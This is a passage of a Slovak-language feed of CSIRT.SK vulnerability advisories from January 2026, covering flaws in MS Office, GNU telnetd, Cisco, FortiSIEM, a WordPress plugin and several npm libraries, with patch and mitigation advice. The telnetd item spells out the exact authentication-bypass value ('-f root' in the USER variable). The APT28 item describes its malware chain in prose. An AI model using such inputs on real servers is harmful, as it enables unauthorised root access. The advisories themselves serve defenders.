<li><a href="https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8">https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-22709">https://nvd.nist.gov/vuln/detail/CVE-2026-22709</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-sandbox-escape-flaw-discovered-in-popular-vm2-nodejs-library/">https://www.bleepingcomputer.com/news/security/critical-sandbox-escape-flaw-discovered-in-popular-vm2-nodejs-library/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3066/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft opravil aktívne zneužívanú zero-day zraniteľnosť v balíku Office</title>
		<link>/posts/3064</link>
					<comments>/posts/3064#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 28 Jan 2026 12:08:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MS Office]]></category>
		<guid isPermaLink="false">/?p=3064</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>[Aktualizované 4.2.2026] Spoločnosť Microsoft vydala mimoriadne bezpečnostné aktualizácie kancelárskeho balíka Microsoft Office, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. CVE-2026-21509 možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>[Aktualizované 4.2.2026]</strong> <strong>Spoločnosť Microsoft vydala mimoriadne bezpečnostné aktualizácie kancelárskeho balíka Microsoft Office, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. CVE-2026-21509 možno zneužiť podvrhnutím špeciálne vytvorených súborov na obídenie bezpečnostných mechanizmov pre ochranu pred zneužitím niektorých funkcií COM/OLE a získanie úplnej kontroly nad systémom.</strong><strong> Zraniteľnosť zneužíva skupina APT28 v rámci rozsiahlej kampane.</strong> </p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Microsoft Office 2016</li>



<li>Microsoft Office 2019</li>



<li>Microsoft Office LTSC 2021</li>



<li>Microsoft Office LTSC 2024</li>



<li>Microsoft 365 Apps for Enterprise</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-21509&nbsp; </strong>(CVSSv3 skóre 7,8)</p>



<p>Vysoko závažná zero-day zraniteľnosť s&nbsp;identifikátorom CVE-2026-21509 spočíva v nedostatočnej implementácii bezpečnostných mechanizmov pre ochranu pred zneužitím zraniteľných funkcií COM/OLE. Neautorizovaný útočník by ju mohol zneužiť lokálne na obídenie bezpečnostných mechanizmov. Potrebuje na to zaslať obeti špeciálne vytvorený súbor MS Office a&nbsp;presvedčiť ju, aby ho otvorila.</p>



<p>Americká <a href="https://www.cisa.gov/news-events/alerts/2026/01/26/cisa-adds-five-known-exploited-vulnerabilities-catalog">CISA pridala zraniteľnosť</a> na svoj zoznam aktívne zneužívaných zraniteľností KEV (Known Exploited Vulnerabilities).</p>



<p>Zraniteľnosť zneužíva ruská štátom sponzorovaná skupina APT28 v rámci rozsiahlej kampane šíriacej malvér prostredníctvom špeciálne vytvorených dokumentov MS Word. Po ich otvorení sa vytvorí pripojenie cez protokol WebDAV k útočníckej infraštruktúre a stiahnu sa ďalšie komponenty. Tie zahŕňajú škodlivú verziu DLL knižnice EhStoreShell.dll a PNG obrázok SplashScreen.png obsahujúci shellcode. Cieľom je nainštalovať malvér MiniDoor (kradne e-maily) a PixyNetLoader, ktorý nainštaluje útočný nástroj Covenant. Súvisiace útoky boli zaznamenané aj na Slovensku.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zraniteľných verzií MS Office 2016 aspoň na verziu 16.0.5539.1001 a&nbsp;MS Office 2019 aspoň na verziu 16.0.10417.20095.</p>



<p>Zraniteľnosť je možné mitigovať aj podľa <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509">odporúčaní výrobcu</a> spočívajúcich v úprave registrov Windows.</p>



<p>Odporúčame preveriť vo Vašich systémoch prítomnosť indikátorov kompromitácie zhrnutých <a href="https://cert.gov.ua/article/6287250">tu</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21509">https://nvd.nist.gov/vuln/detail/CVE-2026-21509</a></li>



<li><a href="https://www.cisa.gov/news-events/alerts/2026/01/26/cisa-adds-five-known-exploited-vulnerabilities-catalog">https://www.cisa.gov/news-events/alerts/2026/01/26/cisa-adds-five-known-exploited-vulnerabilities-catalog</a></li>



<li><a href="https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html">https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html</a></li>



<li><a href="https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit">https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit</a></li>



<li><a href="https://cert.gov.ua/article/6287250">https://cert.gov.ua/article/6287250</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3064/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Telnetd obsahuje kritickú zraniteľnosť</title>
		<link>/posts/3060</link>
					<comments>/posts/3060#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Jan 2026 16:06:00 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[InetUtils]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[telnetd]]></category>
		<guid isPermaLink="false">/?p=3060</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/01/gnu_inetutils-1024x712.png" alt="" /></p>Nástroj telnetd v&#160;balíku GNU InetUtils nesanitizuje používateľské vstupy v&#160;niektorých premenných. Tým umožňuje injektovať hodnoty vedúce k&#160;obídeniu autentifikácie a&#160;získanie prístupu s&#160;oprávneniami...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/01/gnu_inetutils-1024x712.png" alt="" /></p>
<p><strong>Nástroj telnetd v&nbsp;balíku GNU InetUtils nesanitizuje používateľské vstupy v&nbsp;niektorých premenných. Tým umožňuje injektovať hodnoty vedúce k&nbsp;obídeniu autentifikácie a&nbsp;získanie prístupu s&nbsp;oprávneniami používateľa root. V&nbsp;nástroji sa nachádza vyše 10 rokov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GNU InetUtils verzie 1.9.3 až 2.7</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-24061</strong> (CVSS skóre 9,8)</p>



<p>Nástroj telnetd v balíku GNU Inetutils obsahuje kritickú zraniteľnosť, ktorá umožňuje obídenie autentifikácie na diaľku. Zraniteľnosť súvisí s nedostatočnou kontrolou používateľských vstupov na serveri telnetd v rámci premennej prostredia USER. Ak útočník poskytne jej hodnotu ako &#8220;<em>-f root</em>&#8220;, získa prístup na zraniteľný server s administrátorskými oprávneniami.</p>



<p>Spoločnosť Greynoise zaznamenala pokusy o zneužitie tejto zraniteľnosti.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia zraniteľných systémov, napríklad <a href="https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc">tu</a> a <a href="https://codeberg.org/inetutils/inetutils/commit/fd702c02497b2f398e739e3119bed0b23dd7aa7b">tu</a>. V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno mitigovať deaktiváciou servera telnetd alebo použitím vlastnej upravenej funkcie login(1), ktorá nepovoľuje použitie príznaku <em>-f</em>.</p>



<p>Odporúčame limitovanie prístupu cez telnet len z dôveryhodných IP adries a kontrolu dostupných logov na prítomnosť pokusov o zneužitie zraniteľnosti.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://seclists.org/oss-sec/2026/q1/89">https://seclists.org/oss-sec/2026/q1/89</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24061">https://nvd.nist.gov/vuln/detail/CVE-2026-24061</a></li>



<li><a href="https://viz.greynoise.io/tags/inetutils-telnetd--f-auth-bypass-attempt?days=1">https://viz.greynoise.io/tags/inetutils-telnetd&#8211;f-auth-bypass-attempt?days=1</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3060/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cisco opravila kritickú zero-day zraniteľnosť vo viacerých produktoch</title>
		<link>/posts/3058</link>
					<comments>/posts/3058#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Jan 2026 15:56:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3058</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco opravila kritickú aktívne zneužívanú zraniteľnosť CVE-2026-20045 vo viacerých svojich produktoch. Zraniteľnosť umožňuje neautentifikovanému útočníkovi vzdialene vykonávať systémové príkazy...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco opravila kritickú aktívne zneužívanú zraniteľnosť CVE-2026-20045 vo viacerých svojich produktoch. Zraniteľnosť umožňuje neautentifikovanému útočníkovi vzdialene vykonávať systémové príkazy a&nbsp;získať oprávnenia používateľa root.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Unified CM (CSCwr21851)</li>



<li>Unified CM SME (CSCwr21851)</li>



<li>Unified CM IM&amp;P (CSCwr29216)</li>



<li>Unity Connection (CSCwr29208)</li>



<li>Webex Calling Dedicated Instance (CSCwr21851)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-20045</strong> (CVSS skóre 9,8)</p>



<p>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre viacero produktov, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť, spočívajúcu v nesprávnom overovaní používateľských vstupov v rámci HTTP požiadaviek. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie príkazov operačného systému zariadenia, získanie neoprávneného prístupu do jeho systému a eskaláciu privilégií na úroveň používateľa root. Na to potrebuje poslať špeciálne vytvorenú HTTP požiadavku na webové manažmentové rozhranie zraniteľného zariadenia.</p>



<p>Americká CISA zraniteľnosť pridala do svojho zoznamu aktívne zneužívaných zraniteľností KEV (Known Exploited Vulnerabilities).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Cisco odporúča bezodkladnú aktualizáciu zasiahnutých produktov aspoň na verziu 14SU5 alebo 15SU4, alebo inštaláciu záplaty pre podporované verzie podľa <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b#fs">informácií na webstránke</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voice-rce-mORhqY4b</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20045">https://nvd.nist.gov/vuln/detail/CVE-2026-20045</a></li>



<li><a href="https://www.cisa.gov/news-events/alerts/2026/01/21/cisa-adds-one-known-exploited-vulnerability-catalog">https://www.cisa.gov/news-events/alerts/2026/01/21/cisa-adds-one-known-exploited-vulnerability-catalog</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3058/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – december 2025</title>
		<link>/posts/3053</link>
					<comments>/posts/3053#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 26 Jan 2026 13:19:41 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3053</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/01/MS202512.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 12/2025 PDF (1 471 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3053/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť WP modulu Advanced Custom Fields: Extended umožňuje získanie administrátorskej kontroly</title>
		<link>/posts/3051</link>
					<comments>/posts/3051#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 22 Jan 2026 15:59:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Advanced Custom Fields: Extended]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=3051</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Vývojári modulu Advanced Custom Fields: Extended pre WordPress vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE‑2025‑14533 spočíva v...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Vývojári modulu Advanced Custom Fields: Extended pre WordPress vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE‑2025‑14533 spočíva v nesprávnej reštrikcii rolí v rámci formulára pre tvorbu a editáciu používateľov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na získanie administrátorského prístupu a úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Advanced Custom Fields: Extended verzia 0.9.2.1 a staršie</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE‑2025‑14533 </strong>(CVSS 3.1 skóre 9.8)</p>



<p>Kritická zraniteľnosť modulu WordPress Advanced Custom Fields: Extended sa nachádza vo funkcii <em>insert_user</em>, ktorá nekontroluje správnym spôsobom aké používateľské role môže pri registrácii zadať používateľ. Vďaka tomu neautentifikovaný útočník môže pri registrácii zadať rolu „administrator“ a získať administrátorský prístup k celej stránke, čo vedie k úplnému kompromitovaniu inštancie WordPress.</p>



<p><strong><em>Pozn.: Zraniteľnosť je možné zneužiť len pri použití formulárov Create User alebo Update User, ktoré majú sprístupnené pole rolí.</em></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu modulu ACF: Extended na verziu 0.9.2.2 alebo novšiu, a taktiež aktualizáciu redakčného systému a všetkých modulov. Rovnako odporúčame aj kontroly používateľských kont a logov za účelom identifikácie podozrivej aktivity súvisiacej so zneužitím zraniteľnosti.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/blog/2026/01/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/">https://www.wordfence.com/blog/2026/01/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-14533">https://nvd.nist.gov/vuln/detail/CVE-2025-14533</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3051/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť NPM knižnice Binary-Parser umožňuje vzdialené vykonanie kódu</title>
		<link>/posts/3049</link>
					<comments>/posts/3049#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 22 Jan 2026 15:58:28 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[binary-parser]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NPM]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3049</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>Vývojári NPM knižnice pre parsovanie binárnych dát binary-parser vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť CVE‑2026‑1245. Táto spočíva...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>
<p><strong>Vývojári NPM knižnice pre parsovanie binárnych dát binary-parser vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť CVE‑2026‑1245. Táto spočíva v nedostatočnom overovaní používateľských vstupov, čo by mohol vzdialený neautentifikovaný útočník zneužiť na vzdialené vykonanie kódu JavaScript s privilégiami procesu Node.js.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>binary-parser Node.js&nbsp;vo verziách starších ako 2.3.0</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE‑2026‑1245 </strong>(CVSS 3.1 skóre 6.5)</p>



<p>Zraniteľnosť v knižnici binary-parser pre Node.js súvisí s&nbsp;preberaním nesanitizovaných používateľských hodnôt názvov polí a parametrov kódovania priamo do dynamicky generovaného kódu JavaScript. Vzdialený neautentifikovaný útočník tak môže injektovať a spustiť ľubovoľný kód JavaScript v kontexte procesu Node.js, čo môže viesť k úniku dát, manipulácii s aplikáciou alebo vykonaniu systémových príkazov.</p>



<p>Zraniteľnosť nie je možné zneužiť v aplikáciách používajúcich iba napevno kódované definície parserov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a vývojárom odporúčame uistiť sa, či ich produkty a služby nevyužívajú predmetnú knižnicu v zraniteľnej verzii. V prípade, že áno, odporúčame bezodkladnú aktualizáciu knižnice na verziu 2.3.0.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-1245">https://nvd.nist.gov/vuln/detail/CVE-2026-1245</a></li>



<li><a href="https://github.com/keichi/binary-parser">https://github.com/keichi/binary-parser</a></li>



<li><a href="https://kb.cert.org/vuls/id/102648">https://kb.cert.org/vuls/id/102648</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3049/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Fortinet FortiSIEM</title>
		<link>/posts/3047</link>
					<comments>/posts/3047#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 16 Jan 2026 15:44:07 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[FortiSIEM]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3047</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet opravila kritickú zraniteľnosť FortiSIEM, ktorá umožňuje kontrolovať obsah požiadaviek TCP a&#160;následne vykonávať kód a&#160;príkazy s&#160;oprávneniami administrátora, bez potreby...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet opravila kritickú zraniteľnosť FortiSIEM, ktorá umožňuje kontrolovať obsah požiadaviek TCP a&nbsp;následne vykonávať kód a&nbsp;príkazy s&nbsp;oprávneniami administrátora, bez potreby autentifikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiSIEM 7.4 – 7.4.0</li>



<li>FortiSIEM 7.3 – 7.3.0 až 7.3.4</li>



<li>FortiSIEM 7.2 – 7.2.0 až 7.2.6</li>



<li>FortiSIEM 7.1 – 7.1.0 až 7.1.8</li>



<li>FortiSIEM 7.0 – 7.0.0 až 7.0.4</li>



<li>FortiSIEM 6.7 – 6.7.0 až 6.7.10</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-64155</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť FortiSIEM sa nachádza v službe phMonitor, konkrétne vo funkcii <em>phMonitorProcess::initEventHandler</em>. Vyplýva z možnosti prístupu ku jej správcom príkazov bez overenia používateľa a nevhodnej sanitizácie špeciálnych znakov používaných v príkazoch. Vzdialenému neautentifikovanému útočníkovi umožňuje vzdialene vykonávať kód a príkazy s administrátorskými oprávneniami, pomocou špeciálne vytvorených požiadaviek TCP.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia FortiSIEM aspoň na verziu 7.4.1, 7.3.5, 7.2.7 alebo 7.1.9.</p>



<p>Pokiaľ aktualizácia nie je možná, v rámci mitigácie zraniteľnosti môžete obmedziť prístup na port služby phMonitor, TCP/7900.</p>



<p>Spoločnosť Fortinet odporúča umiestniť FortiSIEM na izolovanú časť siete za firewall, bez prístupu z internetu. </p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-772">https://fortiguard.fortinet.com/psirt/FG-IR-25-772</a></li>



<li><a href="https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/">https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2025-64155/">https://arcticwolf.com/resources/blog/cve-2025-64155/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3047/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v NPM knižniciach jsPDF a AdonisJS</title>
		<link>/posts/3045</link>
					<comments>/posts/3045#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 Jan 2026 13:55:18 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[AdonisJS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[jsPDF]]></category>
		<category><![CDATA[NPM]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3045</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>Bezpečnostní výskumníci našli kritické zraniteľnosti vo dvoch knižniciach NPM &#8211; jsPDF na generovanie PDF dokumentov a MVC knižnici AdonisJS. Ide...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci našli kritické zraniteľnosti vo dvoch knižniciach NPM &#8211; jsPDF na generovanie PDF dokumentov a MVC knižnici AdonisJS. Ide o&nbsp;často využívané knižnice, ktoré majú spolu viac ako 3,5 milióna stiahnutí týždenne.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>@adonisjs/bodyparser 10.1.1 a staršie</li>



<li>@adonisjs/bodyparser 11.0.0-next.5 a staršie</li>



<li>jsPDF dist/jspdf.node.js verzie staršie ako 4.0.0</li>



<li>jsPDF dist/jspdf.node.min.js verzie staršie ako 4.0.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2026-21440 </strong>(CVSS 4.0 skóre 9,2)</p>



<p>Kritická zraniteľnosť balíčka NPM @adonisjs/bodyparser umožňuje prechádzanie súborovou cestou. Nachádza sa v mechanizme spracovania súborov zložených z&nbsp;viacerých častí, konkrétne vo funkcii MultipartFile.move(). Problém nastáva v prípade, keď parameter <em>name</em> nie je odovzdaný ako vstup. Aplikácia vtedy použije neošetrený názov súboru poskytnutý klientom. Vzdialenému neautorizovanému útočníkovi môže umožniť zapisovať ľubovoľné súbory na ľubovoľné miesta v súborovom systéme servera, vrátane prepisovania aktuálnych súborov.</p>



<p><strong>CVE-2025-68428 </strong>(CVSS 4.0 skóre 9,2)</p>



<p>Kritická zraniteľnosť knižnice jsPDF umožňuje používateľovi ovplyvniť prvý argument metódy <em>loadFile</em>, čo umožňuje lokálne načítanie súborov (LFI) a prechádzanie súborovou cestou. Vložením neošetrenej cesty má útočník možnosť získať obsah ľubovoľných súborov zo súborového systému, v ktorom beží proces Node.js. Obsah týchto súborov následne bez úprav vloží jsPDF priamo do generovaného PDF dokumentu. Podobne zraniteľné sú aj metódy <em>addImage</em>, <em>html</em> a&nbsp;<em>addFont</em>.</p>



<p>Zraniteľnosti našli Hunter Wodzenski (@<a href="https://github.com/wodzen" target="_blank" rel="noreferrer noopener">wodzen</a>) a výskumníci Endor Labs.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých dát</strong></li>



<li><strong>Kompromitácia systému</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Developerom a&nbsp;systémovým administrátorom, ktorí využívajú zraniteľné knižnice, odporúčame bezodkladnú aktualizáciu na verzie:</p>



<ul>
<li>jsPDF 4.0.0</li>



<li>@adonisjs/bodyparser 10.1.2</li>



<li>@adonisjs/bodyparser 11.0.0-next.6</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21440">https://nvd.nist.gov/vuln/detail/CVE-2026-21440</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-68428">https://nvd.nist.gov/vuln/detail/CVE-2025-68428</a></li>



<li><a href="https://github.com/adonisjs/core/security/advisories/GHSA-gvq6-hvvp-h34h">https://github.com/adonisjs/core/security/advisories/GHSA-gvq6-hvvp-h34h</a></li>



<li><a href="https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2">https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hackers-steal-secrets-via-generated-pdfs/">https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hackers-steal-secrets-via-generated-pdfs/</a></li>



